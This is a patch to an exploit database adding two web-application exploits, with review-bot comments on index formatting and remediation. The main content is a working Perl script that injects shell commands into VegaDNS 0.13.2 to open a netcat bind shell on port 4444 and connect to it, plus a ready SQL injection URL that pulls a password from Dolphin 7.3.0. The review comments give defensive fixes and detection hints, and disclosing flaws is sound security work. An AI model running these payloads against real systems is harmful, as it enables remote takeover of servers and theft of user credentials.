From fdd9fd65e2548eefbb3bbfefe49e6452cb497a57 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Wed, 21 Sep 2016 05:07:40 +0000
Subject: [PATCH] DB: 2016-09-21

2 new exploits
Dolphin 7.3.0 - Error-Based SQL Injection
VegaDNS 0.13.2 - Remote Command Injection
---
 files.csv | 2 +
 platforms/php/webapps/40402.pl | 234 ++++++++++++++++++++++++++++++++
 platforms/php/webapps/40403.txt | 25 ++++
 3 files changed, 261 insertions(+)
 create mode 100755 platforms/php/webapps/40402.pl
 create mode 100755 platforms/php/webapps/40403.txt

diff --git a/files.csv b/files.csv
index b6dea950e..cbb8474e0 100755
--- a/files.csv
+++ b/files.csv
@@ -20403,6 +20403,7 @@ id,file,description,date,author,platform,type,port
 23163,platforms/php/webapps/23163.txt,"Flying Dog Software Powerslave 4.3 Portalmanager - sql_id Information Disclosure",2003-09-19,"H Zero Seven",php,webapps,0
 23164,platforms/php/webapps/23164.txt,"myPHPNuke 1.8.8 - auth.inc.php SQL Injection",2003-09-20,"Lifo Fifo",php,webapps,0
 23165,platforms/windows/dos/23165.txt,"Sun Java 1.x - XML Document Nested Entity Denial of Service",2003-09-22,"Sun Microsystems",windows,dos,0
+40403,platforms/php/webapps/40403.txt,"Dolphin 7.3.0 - Error-Based SQL Injection",2016-09-20,"Kacper Szurek",php,webapps,80
 23166,platforms/windows/dos/23166.pl,"Plug And Play Web Server 1.0 002c - FTP Service Command Handler Buffer Overflow Vulnerabilities",2003-09-21,"Bahaa Naamneh",windows,dos,0
 23167,platforms/irix/dos/23167.c,"Sendmail 8.9.2 - Headers Prescan Denial of Service",1998-12-12,marchew,irix,dos,0
 23168,platforms/linux/local/23168.pl,"Man Utility 2.3.19 - Local Compression Program Privilege Elevation",2003-09-22,"Sebastian Krahmer",linux,local,0
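Review bot: The port column of the two new index rows is inconsistent: the Dolphin row added here (`+40403,...,php,webapps,80`) records `80`, while the VegaDNS row added in the next hunk (`+40402,...,php,webapps,0`) records `0`, although both are PHP web-application entries reached over HTTP. The surrounding context rows for `php,webapps` entries (`23163`, `23164`) all use `0`, so the Dolphin row should probably use `0` as well, or the index header should state when a real port is recorded. Nothing else in either hunk needs attention; they are plain data inserts.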
@@ -21021,6 +21022,7 @@ id,file,description,date,author,platform,type,port
 23802,platforms/linux/remote/23802.txt,"Pegasi Web Server 0.2.2 - Arbitrary File Access",2004-03-11,"Donato Ferrante",linux,remote,0
 23803,platforms/linux/remote/23803.txt,"Pegasi Web Server 0.2.2 - Error Page Cross-Site Scripting",2004-03-11,"Donato Ferrante",linux,remote,0
 23804,platforms/cgi/remote/23804.txt,"cPanel 5/6/7/8/9 - Resetpass Remote Command Execution",2004-03-11,"Arab VieruZ",cgi,remote,0
+40402,platforms/php/webapps/40402.pl,"VegaDNS 0.13.2 - Remote Command Injection",2016-09-20,Wireghoul,php,webapps,0
 23805,platforms/multiple/dos/23805.txt,"Targem Games Battle Mages 1.0 - Remote Denial of Service",2004-03-11,"Luigi Auriemma",multiple,dos,0
 23806,platforms/cgi/webapps/23806.txt,"cPanel 5/6/7/8/9 - dir Parameter Cross-Site Scripting",2004-03-12,Fable,cgi,webapps,0
 23807,platforms/cgi/webapps/23807.txt,"cPanel 5/6/7/8/9 - Login Script Remote Command Execution",2004-03-12,"Arab VieruZ",cgi,webapps,0
diff --git a/platforms/php/webapps/40402.pl b/platforms/php/webapps/40402.pl
new file mode 100755
index 000000000..af4575aac
--- /dev/null
+++ b/platforms/php/webapps/40402.pl
@@ -0,0 +1,234 @@ +#!/usr/bin/perl + $izd= qq{ + ██╗███████╗██╗ ██╗███╗ ██╗ █████╗ ██████╗ ██████╗ ██████╗ ██████╗ + ██║╚══███╔╝██║ ██║████╗ ██║██╔══██╗ ██╔══██╗██╔══██╗██╔═══██╗██╔══██╗ + ██║ ███╔╝ ██║ ██║██╔██╗ ██║███████║ ██║ ██║██████╔╝██║ ██║██████╔╝ + ██║ ███╔╝ ██║ ██║██║╚██╗██║██╔══██║ ██║ ██║██╔══██╗██║ ██║██╔═══╝ + ██║███████╗╚██████╔╝██║ ╚████║██║ ██║ ██████╔╝██║ ██║╚██████╔╝██║ + ╚═╝╚══════╝ ╚═════╝ ╚═╝ ╚═══╝╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ + };$vg=qq{ + ▀ ▐░░▄ ▄▄▄▄▄▄▄ + ▀▀ ▄░ ▐▀▄▀▄ ▄▄▓▓▓▒▒▒▒▒▒▓▓▄ + ▀▀▀ ▐▄▄░ ▀▐▄ ▄▀▄ ▄ ▄▄▀▀▀ ▀▀▓▓▓▓▒▒░▒▓▓▌ + ▀ ▄ ▐▀▄ ▀▄░ ▄▄░░ ▀▓▓▓▓▓▓▓▓▓▌ + ▐▀▄▀▄ ▀▀▄▀▄ ▓▌░░ ▄▄▐▓▀▓▓░▀▓▓▓▌ + ▀▄▀▄▀▄░ ▐▀▄▀▄ ▐▓▒▄▄ ░▓▀ ▐▀▄▀▒▄▄▒▀▓▓▓▄ ▄▄▄▓▓▓▓▄▄▄ + ▀ ▀▄▀▌▄░ ▀▄▒▄ ▐▀▓▓ ░░ ▒░░ ▀▀▒▒▒▓▓▒░░░ ░░▒▒▄ + ▀ ▀ ▐▌ ░█░ ▒▌▐▀▄░▄ ▒░▒░░ ░░▒░ ░░▓ + ▐▄ ░░░ ░▒░░▒▌ █▄▒░▄ ▄▓▒░ ▐░░ ░░░▒░ ░░ + ▓▓░▄▓ ░▒░ ░░▐▓ ██▓▓▓▓▓░▄▄ ▐░░░▒▄▒░░░ ░ ░░░░ + ▀█▓▒▓▓ ░░░░ ░█▒▓▒▒▒▒███▒█▒▒░▒░▐▓▒░░░░░░░ ░ ░░▒▒▒░▒ + █░░ ░▒▒░░█▒▒░░░░░ ░░░░░▐▓▒░░░ ░░░ ░░░▒▒▒█░ ░▒▒ + ▐▒▒▒ █▒▓▌░░░ ░░░▒▒▒░░░░▒▓▓▒██▀▀░░ ░░ ░ ░░▒░░░ ░▒ + ▓▒░░▐▒░ ░▓ ██▌░░░▄▒▒░░▒▒▒░▒▒▓▓░░ ░░░░▒▄░░▒░░ ░▒ + ▓▒ ░▒▒▒█ ░▒▓ ▐▒▓░▒▒░ ▐░░ ▀▒▒▒░░░ ░ ▐░░▒▒▒ ░ ░ + █░▀▒▒▓▓▓▒▒░░▓ ▄▒░ ▀▒░░░░ ░ ░░░░░ ░░▒▒▒ ░ ▒▒ + ▀▓▓▀░▓▌▒░▒ ░▒▓▓▓▒▒▒░░░░ ░ ░░▒▒░ ░ ░░▒ + ▀▀▓▓▌▀░ ░ ░▐▓▓▓▒▓▓▓▄░░░▄ ▐░░░▒▒▒▀ ▐░▒▄░ ▐░░░▒ + ▐▒▒░░▄▓▓░▌ ░▒▒▓▓▓▓▒░░░ ░▒░▒▓▒▒░▒░░░░░▒░ ░░▒▒▒▓ + ▀▓▓▀▒▄░░░░░ ░▒▒▓▓▌▀▀▓▓▄▓▒▓░░▒▒░░░▒▓▒▓▓▀▀▀▀▀▀▀▀▀▓▓▄ + ▓▒░░░▄ ░░▒▓▀ ▀▓▓▓▒▒▓▓▓▓▀░░▒▒▒▀▓▓▓▓▀▀▀▀▓▓ + ▀▓▄▒▒▒░░░▒▓ ▐▓▓▓▓▓▒▒▒▓▓▀▒▒▒▀▀░░░░░▒▒▒▓▓▓▄ + ▀▀▀▀ ▀ ▐▓▓▓▀▀▀▀░░░░▒░░▒▒▒▓▓▓▓▒▀▀▀▓▓▌ + ▄▓▓▓▓▀▀▓▓▓▓▓▓██▀▀▀░░░░░ ▒ + ▓▒▒▓▌░░░░░░░▒▌░░░░ ░ ░ ▀ ░▄ + ▓▓▓▓▒▌▄░▒▒▒▒▓▒░░░░▀ ░░░ ░░░▒▌ + ▄▓▀▀░░░▒▒▄▒▒▓▓░░▄▒░░░▄▄▄▄ ░░░░░▐░ + ▄▐█▒ ▒░▒▒▒▒░░▓▓▓▒▓▓▓▒▒▒▀░░▀ ▀ ░░▒▌ + ▄▓▒▒░░░░░░▒▒▒▒▒░▒▓▓▓▓▓▓▓▒▒░ ░ ░ ▒▒█▀ + ▐▓▒░░░░░░░▒▒▒▒▒▒░▒▓▓▓▓▓▓▓▓▒▌ ░ ▐░ ░ ░▒ + ▐▒░░░░░░▒▒▒▒▒▒░░▓▓▓▓▓▓▓▓▓▓▓▒▌░ ░ ▐░░░ ░█ + ▒█░░░░░░▒▒▒▒░░▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▒▒▌ ░ ▐░░░ ░░▒ + ▐▓▒░▒░░░░░▒▒▒░▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓ ▒▒░░ ░░░░ ░░▒ + ▄▓▒▒▒░░░░░░░░░░░▓░▓▓▒▓▓▓▓█▀▒▓▓▓▓▓▓▓▓▒░ ░░░░ ░░ + ▄▒░░░░ ░░░░▒▒▓▓▓▓██▌▐▓▓▓░░▓▓▌░▓▓▓▓▒░ ░ ░░░░ ░░▒ + ▒░░░░░░▒▒▓▓▓▓▓▓▓█ ▐▓▓▓▓░░░▒▌░▓▓▓▓▒░ ░ ░░░░ ▐▒▌ + 
▒▀░░░▒░░▓▒▓▓▓▓▓▌▀ ▐▓▓▓▓░░░▒▌░▓▓▓▓▒░ ░ ░░░░ ░▒▌ + ▓ ░▒░░░▀▀▒▓▓▓▓▓▌ ▐▓▓▓ ░░░░░░▓▓▓▓▒░ ░ ░ ░ ░▒▒▌ + ▓▓▒░▒░░▒▒▒▓▓▓▓▓▓▌ ▀▓▓▓▓▓▓▓▓▒░ ░░░ ░▄░▒▓▌ + ░ ▀▒▓▓▓▓▓▓▓▓▓▌▀▀ ▒░ ░ ░░▓▓▄ + ░ ▓ ▓▒░ ░░▒▀▒░▒▄ + ▄ ░ ▀ ▓▒░░▄░░░░░▀░░░▌░░▒ + ░ ▄▄▀ ▀▒▒▒▒▒▄ ▄░░░░ ▀▀ + ░░░ ▓▓▓▒▒▓▄░░ ░ ▐░▄ ░ + ░ ░▀░░ ▀▀▒▒▒▒▀ ▀▒ ▄ + ▄▄▄▄▄▄ ▄▀▒▓▌▄ ▀▄ ░ ░ + ▓▓▓▓▌▄ ▄▓▓▓▓▓▓▓ ▒ ▄ ░ ▄ + ▓▒▒▓▓▓▓▓▓▓▓▒▓▓▓▓▓ ░ ▀▓ ▄ + ▓▒▒▓▓▓▓▓▓▒▓▓▓▓▓▀ ░ ▀▄░▒▌▄▄ + ▄▄▄▓▓▓▓▓▓▓▓▓▓▓███▀ ▄▓▄▄▄▄▄▒▓▓▓▓▄ + ▄▓▓▓▓▓▓▓▓▓▒▓▓▓▓▓█ ▐▓████▓▓▓▓▓▓▒▓▓ +▓▓▓▓▄▄▄▄▓▓▓▓▓▓▓█ ▐▓░░░▒▓▓▓▓▒▓▓ + ▐▓▓░▒▓▓▓▓▓▓▓ + ▐▓▓▓▓▓▓▒▒▓▌ + ▓▓▓▓█▒▒▒▒▒▒▒▓▓▌ + ██▒░░░░░░░▓▓███ + + };$b=qq{ + ██╗ ██╗███████╗ ██████╗ █████╗ ██████╗ ███╗ ██╗███████╗ + ██║ ██║██╔════╝██╔════╝ ██╔══██╗██╔══██╗████╗ ██║██╔════╝ + ██║ ██║█████╗ ██║ ███╗███████║██║ ██║██╔██╗ ██║███████╗ + ╚██╗ ██╔╝██╔══╝ ██║ ██║██╔══██║██║ ██║██║╚██╗██║╚════██║ + ╚████╔╝ ███████╗╚██████╔╝██║ ██║██████╔╝██║ ╚████║███████║ + ╚═══╝ ╚══════╝ ╚═════╝ ╚═╝ ╚═╝╚═════╝ ╚═╝ ╚═══╝╚══════╝ + + + ██████╗ ███████╗███╗ ███╗ ██████╗ ████████╗███████╗ + ██╔══██╗██╔════╝████╗ ████║██╔═══██╗╚══██╔══╝██╔════╝ + ██████╔╝█████╗ ██╔████╔██║██║ ██║ ██║ █████╗ + ██╔══██╗██╔══╝ ██║╚██╔╝██║██║ ██║ ██║ ██╔══╝ + ██║ ██║███████╗██║ ╚═╝ ██║╚██████╔╝ ██║ ███████╗ + ╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚══════╝ + + + ███████╗██╗ ██╗██████╗ ██╗ ██████╗ ██╗████████╗ ██████╗ ██╗ ██╗ + ██╔════╝╚██╗██╔╝██╔══██╗██║ ██╔═══██╗██║╚══██╔══╝ ██╔══██╗╚██╗ ██╔╝ + █████╗ ╚███╔╝ ██████╔╝██║ ██║ ██║██║ ██║ ██████╔╝ ╚████╔╝ + ██╔══╝ ██╔██╗ ██╔═══╝ ██║ ██║ ██║██║ ██║ ██╔══██╗ ╚██╔╝ + ███████╗██╔╝ ██╗██║ ███████╗╚██████╔╝██║ ██║ ██████╔╝ ██║ + ╚══════╝╚═╝ ╚═╝╚═╝ ╚══════╝ ╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ + + + ▄ + ▄█▀ ▀█▄▄ + ▄▄▓▀▀ ▀▓▄▄ + ▄▓▓▀ ▀█▓▄ + ▄▓▓▀ ▀▓▓▓▄ + ▄▓▓█▀ ▀▓▓▄▄ + ▄▓▓▓▀ ▀▓▓▓▄ + ▄▓▓▓▀ ▀▓▓▓▓ + ▓▓▓▓▀ ▀▓▓▓▓▄ + ▓▓▓▓█ ▀▓▓▓▓ + ▐▓▓▓▀ ▓▓▓▌ + ▓▓▓▌ ▐▓▓▓ + ▓▓▓▌ ▄▓▓▓ + ▓▓▓▓ ▄▓▓▓ + ▓▓▓▓▓▓▓▓▓▓██ ██▓▓▓▓▓▓▓▓▓▓ + ▀▀▀▀ ▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄ ▀▀█ + ▄▄▓▓▓▓▓▓▓▓▓▓▓████▓▓▓▓▓▀ ▓▓▓▓▓████▓▓▓▓▓▓▓▓▓▓▓▄▄ + ▄▓▓▓▓█▀▀▀ ▓▓█ ▐▓▓ ▀▀▀█▓▓▓▓▓ + ▓▓▓ ▐▓█ ▀▓▌ ▓▓▓ + █▓▌ ▓▀ ▌ ▀▓ ▐▓▓ + ▀▓ ▄ ▄▀ ▐ ▌ ▓▓ ▐▄ █ ▀▓▄ ▄▌ ▓▀ + █ 
▀▓▄ ▄▓█ ▄▓ ▐▓▓▌ █▓ ▀▓▄▄ ▄▓▀ ▓ + ▄▌ █▓▓▓▓▓▀ ▓▓▓▄▓▌▐▓▄▄▓▓ ▀▓▓▓▄▓▓▀ ▐▄ + ▓▓ █▀▀ ▀█▀ ▀▓ + ▓▓ ▄ ▄▀ ▄ ▄ ▓▓ + ▓▓▓▄ ▄▓▀ ▄█ ▄ ▄ ▀▄ ▀▓▄ ▓▓▓ + ████▀▀▀▀▀▀▀▀▀ ▓▀ ▄ ▄ ▓ █ ▓ ▀▀▀▀▀▀▀▀▀████ + ▄▓▀ ▓ ▄▌▐ ▐ ▌ ▌▐▓ ▓ ▓▄ + ▄▓ ▄▄▓▌▐▓ ▐ ▓ ▓ ▓ ▐▄ ▌ ▓▌▐▓▄▄ ▓▓ + ▓▓▓█▀▀ ▀█▓▓▌ ▓ ▐▓ █▌ ▓ ▓▓█▀ ▀▀█▓▓▓ + █▀ ▀ ▐▓▄▓▌ ▐▓▄▓▌ ▀ ▀█ + ▀ ▀▀ + + + ___ .___ .______ ._______._____ .___.__ ._______ .____ .___ +.___ | |: __|: __ \ : .____/:_ ___\ : | \ : .___ \ | |___ | | +: | /\| || : || \____|| : _/\ | |___| : || : | || | || | +| |/ : || || : \ | / \| / || . || : || : || |/\ +| / || || |___\|_.: __/|. __ ||___| | \_. ___/ | || / \ +|______/|___||___||___| :/ :/ |. | |___| :/ |. _____/ |______/ + : : :/ : :/ + : : : + + };$g=qq{ + + ██████╗ ██████╗ ███████╗███████╗████████╗███████╗ + ██╔════╝ ██╔══██╗██╔════╝██╔════╝╚══██╔══╝╚══███╔╝ + ██║ ███╗██████╔╝█████╗ █████╗ ██║ ███╔╝ + ██║ ██║██╔══██╗██╔══╝ ██╔══╝ ██║ ███╔╝ + ╚██████╔╝██║ ██║███████╗███████╗ ██║ ███████╗ + ╚═════╝ ╚═╝ ╚═╝╚══════╝╚══════╝ ╚═╝ ╚══════╝ + +To all the people with mad skills who share their knowledge: + + TecR0c, mr_me, action_dk, bcoles, TheColonial, jduck, hdmoore, rgod, TESO, + mdowd, kernelpool, silviocesare, egyp7, w00 w00, felinemenace, corelan, + lgandx, _sinne3r, alexsotirov, fjserna, solardiz, l0pth, cDc, therealsaumil, + laughing_mantis, g0tm1k, nmrc, and many many more.... + + };$a=qq^ + + █████╗ ███╗ ██╗ █████╗ ██╗ ██╗ ██╗███████╗██╗███████╗ + ██╔══██╗████╗ ██║██╔══██╗██║ ╚██╗ ██╔╝██╔════╝██║██╔════╝ + ███████║██╔██╗ ██║███████║██║ ╚████╔╝ ███████╗██║███████╗ + ██╔══██║██║╚██╗██║██╔══██║██║ ╚██╔╝ ╚════██║██║╚════██║ + ██║ ██║██║ ╚████║██║ ██║███████╗██║ ███████║██║███████║ + ╚═╝ ╚═╝╚═╝ ╚═══╝╚═╝ ╚═╝╚══════╝╚═╝ ╚══════╝╚═╝╚══════╝l + +VegaDNS is a tinydns administration tool written in PHP to allow easy +administration of DNS records through a web browser. +-- http://www.vegadns.org + + +The file axfr_get.php allows unauthenticated access and fails to correctly +apply input escaping to all variables that is based on user input. 
This +allows an attacker to inject shell syntax constructs to take control of the +command execution. + +The following code from axfr_get.php shows how the variable $file becomes +tainted trough the $domain variable which is tainted from direct user input. +The application tries to prevent this by escaping the $domain and $hostname +variables, but fails to escape the $file variable. + +---------------------------cut--------------------------- + * NOTE: + * This functionality ONLY exists outside of the main application + * because tcplient kept dying fatally due to file descriptor 7 + * being unavailable, which only occurs AFTER session_start() is + * called. + * + */ +require_once 'src/config.php'; +// CHECKS +// Make sure the hostname was given +if(!isset($_REQUEST['hostname']) || $_REQUEST['hostname'] == "") { + echo "ERROR: no hostname given\n"; + exit; +} +// Make sure that some domains were given +if(!isset($_REQUEST['domain']) || $_REQUEST['domain'] == "") { + echo "ERROR: no domain was supplied\n"; + exit; +} +$domain = $_REQUEST['domain']; +$hostname = $_REQUEST['hostname']; +$rand = rand(); +$file = "/tmp/$domain.$rand"; +$command = "$dns_tools_dir/tcpclient -R '".escapeshellcmd($hostname)."' 53 $dns_tools_dir/axfr-get '".escapeshellcmd($domain)."' $file $file.tmp 2>&1"; +exec($command, $out); +---------------------------end--------------------------- + + ███████╗██╗ ██╗██████╗ ██╗ ██████╗ ██╗████████╗ + ██╔════╝╚██╗██╔╝██╔══██╗██║ ██╔═══██╗██║╚══██╔══╝ + █████╗ ╚███╔╝ ██████╔╝██║ ██║ ██║██║ ██║ + ██╔══╝ ██╔██╗ ██╔═══╝ ██║ ██║ ██║██║ ██║ + ███████╗██╔╝ ██╗██║ ███████╗╚██████╔╝██║ ██║ + ╚══════╝╚═╝ ╚═╝╚═╝ ╚══════╝ ╚═════╝ ╚═╝ ╚═╝ + ^; + +print "$izd\n"." " x 17 . "VegaDNS pre-auth RCE exploit by \@Wireghoul\n"; +print " "."=" x 50 ."[justanotherhacker.com]==\n"; +&usage if ($ARGV[0] !~ m!.+://([^/:]+)!); +$h=$1; +print " . . . 
Locating netcat\n"; +$cmd='which+nc'; +$t=$ARGV[0]."/axfr_get?hostname=izunadrop&domain=%3b$cmd%3bagev"; +$z=`curl -s -k '$t'`; +if ($z !~ m{/nc}) { + print " ! ! ! netcat not found! Manual exploitation required:\n"; + print " $ARGV[0]/axfr_get?hostname=izunadrop&domain=%3bCMD%3b\n"; + exit 1; +} +print " . . . netcat found: $z\n"; +print " . . . Performing IZUNA DROP!\n"; +# ← · ↑ · → · ↓ · ↖ · ↗ · ↘ · ↙ +print " ↓ ↓ ↑ *k* → → *p*\n"; +$cmd="$z+-e+/bin/sh+-lp+4444"; +$t=$ARGV[0]."/axfr_get?hostname=izunadrop&domain=%3b$cmd%3bagev"; +$z=`curl -m 3 -s -k '$t &'`; +print $vg."\n"; +print " . . . K.O ! ! ! Connecting to bindshell on $h port 4444\n"; +system("nc -v $h 4444"); +sub usage { print "Usage $0 http://host/path/to/vegadns\n\n$ARGV[0]"; exit; \ No newline at end of file diff --git a/platforms/php/webapps/40403.txt b/platforms/php/webapps/40403.txt new file mode 100755 index 000000000..1861955cc --- /dev/null +++ b/platforms/php/webapps/40403.txt @@ -0,0 +1,25 @@ +# Exploit Title: Dolphin 7.3.0 Error Based SQL Injection +# Date: 20-09-2016 +# Software Link: https://www.boonex.com/ +# Exploit Author: Kacper Szurek +# Contact: http://twitter.com/KacperSzurek +# Website: http://security.szurek.pl/ +# Category: webapps + +1. Description + +`$_REQUEST['key']` is not escaped inside `actions.inc.php`. + +http://security.szurek.pl/dolphin-730-error-based-sql-injection.html + +2. Proof of Concept + +http://dolphin/flash/XML.php?module=chat&action=RayzSetMembershipSetting&id=1&_t=41920&key=' UNION select 1, exp(~(select*from(SELECT Password FROM profiles WHERE ID=1)x)); -- a + +which is rendered as: + +Database access error. Description: DOUBLE value is out of range in 'exp(~((select '%password_here%' from dual)))' + +3. Solution: + +Update to version 7.3.1 \ No newline at end of file
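Review bot: The advisory text explains the root cause but gives no remediation, so a defender reading this entry has nothing to act on; a short `Solution` section of the kind 40403.txt carries would help. The quoted excerpt shows what it should say: `$file = "/tmp/$domain.$rand"` is built from `$domain` before any escaping and is then interpolated raw into `$command`, and `escapeshellcmd()` on `$domain`/`$hostname` only neutralises metacharacters without quoting, so the application-side fix is to validate both values against a strict hostname pattern before use, pass each argument through `escapeshellarg()`, and derive the temporary path with `tempnam()` rather than from request input. Because the parameters travel in the query string, requests to `axfr_get` whose `domain` or `hostname` carries `%3b` or other shell metacharacters are visible in ordinary web-server access logs, which is worth stating as a detection hint. The quoted PHP begins mid-comment (`* NOTE:`), so the enclosing context of axfr_get.php is outside the hunk.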
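Review bot: The `3. Solution:` section stops at `Update to version 7.3.1` and does not say what makes the flaw exploitable, which is what an operator who cannot upgrade immediately needs. The description already names the defect (`$_REQUEST['key']` is not escaped inside `actions.inc.php`), so the code-side fix is to bind `key` as a query parameter or escape it before it reaches the query; the rendered response `Database access error. Description: DOUBLE value is out of range in ...` also shows that the error-based channel depends on database error text being returned to the client, so not echoing database errors to end users removes the disclosure oracle even though it does not remove the injection. Suggested addition under `3. Solution:`: `Until upgraded, suppress database error details in responses and escape or parameterise the key parameter in actions.inc.php.`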